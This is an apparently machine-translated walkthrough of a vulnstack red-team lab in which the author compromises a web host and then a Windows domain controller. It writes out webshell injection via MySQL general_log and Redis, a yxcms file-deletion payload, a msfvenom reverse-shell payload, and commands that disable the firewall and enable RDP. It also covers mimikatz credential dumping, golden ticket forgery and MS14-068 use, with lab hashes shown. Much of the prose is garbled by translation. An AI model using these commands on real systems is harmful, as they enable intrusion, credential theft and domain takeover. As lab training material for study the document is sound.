ATT&CK Actual Combat Series-Red Team Actual Combat (1)

Article Directory

Environment setup

Download link :
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

Official description

The Red Team actual combat series mainly uses real corporate environments as examples to build a series of shooting ranges and learn through the trinity of exercises, video tutorials, and blogs. In addition, this actual combat completely simulates the ATT&CK attack link for construction, opening a complete closed loop. Follow-up will also build a real APT actual combat environment to grow from actual combat. Regarding the environment, various actual combat routes can be simulated. At present, the author's actual combat route is given as follows. All virtual machines have a unified password: [email protected]:

1. Environment construction
1. Environment construction and testing
2. Information collection

2. Vulnerability exploitation
3. Vulnerability search and exploitation
4. Background Getshell upload skills
5. System information collection
6. Host password collection

3. Intranet collection
7. Intranet-continue information collection
8. Intranet attack posture-information leakage
9. Intranet attack posture-MS08-067
10. Intranet attack posture-SMB remote desktop password guessing
11. Intranet attack posture -Oracle database TNS service vulnerability
12. Intranet attack posture-RPC DCOM service vulnerability

4. Lateral movement
13. Intranet other host port-file reading
14. Intranet other host port-redis
15. Intranet other host port-redis Getshell
16. Intranet other host port-MySQL database
17. Intranet other host port Port-MySQL privilege escalation

Fifth, build a channel
18. Other host ports in the intranet-proxy forwarding

6. Persistent control
19. Domain penetration-collection of domain member information
20. Domain penetration-basic service weak password detection and deep utilization of powershell
21. Domain penetration-lateral movement [wmi utilization]
22. Domain penetration-C2 command execution
23. Domain Penetration-Use DomainFronting to realize deep hiding of beacon
24. Domain Penetration-Realization and Utilization of Domain Control

Seven, trace cleanup
25, log cleanup

Network topology:

Insert picture description here

Local environment:

Insert picture description here

Configure the network environment, start phpstudy under win7

Insert picture description here

Penetration testing section

The web is directly a php probe

Insert picture description here

NMAP

Insert picture description here

table of Contents

Insert picture description here

Website backup files

Insert picture description here

phpinfo
http://192.168.60.170/phpinfo.php

Insert picture description here

phpmyadmin log getshell

http://192.168.60.170/phpmyadmin/
http://192.168.60.170/phpmyadmin/examples/
http://192.168.60.170/phpmyadmin/setup/
http://192.168.60.170/phpmyadmin/changelog

Insert picture description here

There is no other discovery for the time being. The
blasting of phpmyadmin resulted
in several empty passwords, but the empty passwords could not log in

Insert picture description here


Insert picture description here
Insert picture description here

No permission to read the file

Insert picture description here

Found a yxcms database in phpmyadmin

Insert picture description here

Try to write a sentence,

select '<?php eval($_POST[pwd]); ?>' into outfile 'C:/phpStudy/WWW/shell.php'
Insert picture description here

Attempt to modify secure_file_priv but failed

show variables like "secure_file_priv";
set global secure_file_priv='';
Insert picture description here

Upload a sentence using mysql general_log_file

show variables like 'general%'
Insert picture description here


Open general_log log

set global general_log = 'ON'

Put the general_log log path in the root directory of the website

set global general_log_file='C:/phpStudy/WWW/shell.php'
Insert picture description here
Insert picture description here

Because the general_log log will record the sql statement we executed, so we will also record a sentence when we execute php, because the suffix is ​​changed to php, so php encounters the php header <? will think this is a php file

Insert picture description here

Visit again, report a php error, confirm that it has been parsed by php, but there is a fatal error on line 940

Insert picture description here

Clear the general_log log and try again

set global general_log = 'OFF';
rename table mysql.general_log TO mysql.general_log2;
delete from mysql.general_log2;
show variables like 'general%'
rename table mysql.general_log2 TO mysql.general_log;
set global general_log = 'ON';
set global general_log_file='C:/phpStudy/WWW/shell2.php'
show variables like 'general%'
select '<?php eval($_POST[pwd]);?>';
Insert picture description here

yxcms

The website leaked the back-end address and user password, and the user password was a weak password.
Baidu queried the relevant directory structure and found the back-end login page
http://192.168.60.170/yxcms/index.php?r=admin/index/login

Insert picture description here

Searched the yxcms related vulnerabilities online, reproduced here

Front-end XSS

Insert picture description here


Back-end verification, the front-end will also be displayed after verification

Insert picture description here
Insert picture description here

Write arbitrary files to getshell

New template

Insert picture description here

Get the upload point through the previously leaked backup file

Insert picture description here

http://192.168.60.170/yxcms/protected/apps/default/view/default/shell.php.php

Insert picture description here

Arbitrary file deletion

You need to log in to the background first, and then it will show that the thumbnail does not exist after accessing

Payload: http://sb.com/index.php?r=admin/photo/delpic
POST: picname=…/…/protected/apps/install/install.lock

Insert picture description here
Insert picture description here
Insert picture description here

Post-infiltration stage

Online CS

start artifact.exe
Insert picture description here


This password is the default password

Insert picture description here


Elevate rights to system users

Insert picture description here

Domain control information collection

View intranet segment

Domain controller is generally DNS host

Insert picture description here

whoami, hostname

Insert picture description here

Query system architecture, install software

echo %PROCESSOR_ARCHITECTURE%
wmic product get name,version
Insert picture description here

Query domain list and all users

net view /domain
net user /domain
Insert picture description here

Query from the domain controller time, if the current user is a domain user returns the current time from the domain controller, also used to determine the primary field, the primary field is generally used as a time server
then use net group "domain controllers" /domainto verify the host domain controller

net time /domain
net group "domain controllers" /domain

The main domain is owa.god.org

Insert picture description here


domain password policy

net accounts /domain
Insert picture description here

Confirm the domain controller IP

Insert picture description here

Collection and penetration of extraterritorial information

Routing information

Insert picture description here

arp table

Insert picture description here

3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Insert picture description here

Turn off the firewall while connecting

netsh firewall set opmode disable

Add user

Insert picture description here
Insert picture description here

msf generate Trojan

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.60.129 LPORT=7777 -f exe > shell.exe

Local monitoring

Insert picture description here

Upload

Insert picture description here
Insert picture description here

Domain penetration

SMB Beacon C2 command execution

Create a listener

Insert picture description here

Login with psexec

Insert picture description here

Obtain domain control OWA beacon

Insert picture description here

CS/MSF linkage

msf monitor

Insert picture description here

CS creates a new listener

Insert picture description here

Increase the
launch of session-derived msf

Insert picture description here

Identify the 141 host of the previous arp

Insert picture description here

shell garbled

chcp 65001

Add route

run autoroute -s 192.168.52.0/24
run autoroute -p
run get_local_subnets
Insert picture description here

Run arp by the way

Insert picture description here

Scan port 141
because Oracle and redis are included in the environment description, so the port is added

Insert picture description here



There is 08067 in the description of 141 , but it can't be called, 17010 can be called, but the server will be blue screened

Insert picture description here

138

Insert picture description here

The 138 domain control host could not be hit, but it succeeded after closing the firewall.

Turn off the firewall

netsh advfirewall set allprofiles state off
Insert picture description here
Insert picture description here

redis getshell

Redis is actually problematic.
Redis is mentioned in the official description, but it is not accessible by default. I really didn’t find other ideas, so I had to modify the redis zero-time configuration file.

127.0.0.1:6379> config set protected-mode no
Insert picture description here

msf related redis module

auxiliary/scanner/redis/file_upload 
auxiliary/scanner/redis/redis_login
auxiliary/scanner/redis/redis_server
Insert picture description here


80 is opened on the 138 domain control target machine, through the previous route, it can already be directly accessed

Insert picture description here

Write webshell to the physical path through redis.
At this time, redis only needs the directory write permission,
but it is more difficult without knowing the physical path.

192.168.52.138:6379> config set dir C:\inetpub\wwwroot\
OK
192.168.52.138:6379> config set dbfilename shell.aspx
OK
192.168.52.138:6379> set x "<% @Page Language='Jscript'%><%eval(Request.Item['pwd'],'unsafe');%>"
OK
192.168.52.138:6379> save
OK
192.168.52.138:6379>
Insert picture description here

Gold note

Prerequisites for making gold bills

  1. Domain name
  2. SID of the domain
  3. The password hash value of the krbtgt account of the domain (NTLM or aes256_hmac)
  4. Fake username, it can be any user or even non-existent

The krbtgt user is the user used to manage the issuance of bills in the domain control. With the authority of this user, you can forge any user in the system

The domain name has been collected earlier: god.org

SID: whoami /user

Insert picture description here

Domain ID and krbtgt account hash

mimikatz # privilege::debug #(提升权限)
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords #(抓取明文密码和 hash)
mimikatz # lsadump::dcsync /domain:god.org /user:krbtgt #导出 krbtgt 密码 hash
mimikatz # lsadump::dcsync /domain:god.org /all /csv #导出所有域内用户密码 hash 值:

SID of the domain: S-1-5-21-2952760202-1353902439-2381784089-500
aes256_hmac: a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
NTLM:58e91a5ac358d86513ab224312314061

Insert picture description here
"kerberos::golden /domain:<域名> /sid:<域SID> /aes256:<aes256_hmac> /user:<任意用户名> /ptt"
kerberos::golden /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089-500 /aes256:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df /user:abc /ptt
Insert picture description here

Forged bills

Insert picture description here

CS can also forge bills

Insert picture description here

Forged bill information

Insert picture description here

MS14-068

MS14-068 is a privilege escalation vulnerability that allows ordinary users to escalate privileges to obtain domain control privileges. The patch provided
by Microsoft is kb3011780. In domain controllers above server 2000, as long as this patch is not applied, it may be used.

Access to domain sharing is denied

Insert picture description here

Use MS14-068 to generate tickets

MS14-068.exe -u   域用户@域控名  -p 域用户密码 -s 域用户sid -d 域ip
MS14-068.exe -u [email protected] -s S-1-5-21-2952760202-1353902439-2381784089-500 -p [email protected] -d 192.168.52.138
Insert picture description here

Delete the current cached kerberos ticket before importing

mimikatz # kerberos::purge
or
klist purge

Import kerberos tickets using mimikatz

mimikatz # kerberos::ptc [email protected]
C:\phpStudy\WWW>dir \\owa.god.org\C$
Insert picture description here